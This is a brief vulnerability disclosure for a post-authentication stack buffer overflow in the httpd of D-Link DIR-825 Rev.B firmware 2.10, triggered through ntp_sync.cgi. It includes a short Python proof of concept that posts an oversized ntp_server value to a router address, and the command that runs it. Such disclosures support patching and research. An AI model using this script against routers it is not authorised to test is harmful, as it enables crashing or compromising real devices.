Description
there is a stack-based buffer overflow vulnerability that can be used to execute any code after user authentication
Vulnerability location: file: /sbin/httpd
The attacker calls this function by sending a post packet to the http://ip/ntp_sync.cgi
Firmware version
version: Rev.B 2.10
download link: ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DIR-825/REVB/
Post package
5 ip = "http://192.168.0.1/"
6 url = ip + 'ntp_sync.cgi '
7
8 command = 'A'* 0x50
9
10 payload = {
11 'ntp_server': command,
12 }
13
14 r = requests.post(url, data=payload)
Exploit exp
python3 ntp-server-overflow.py
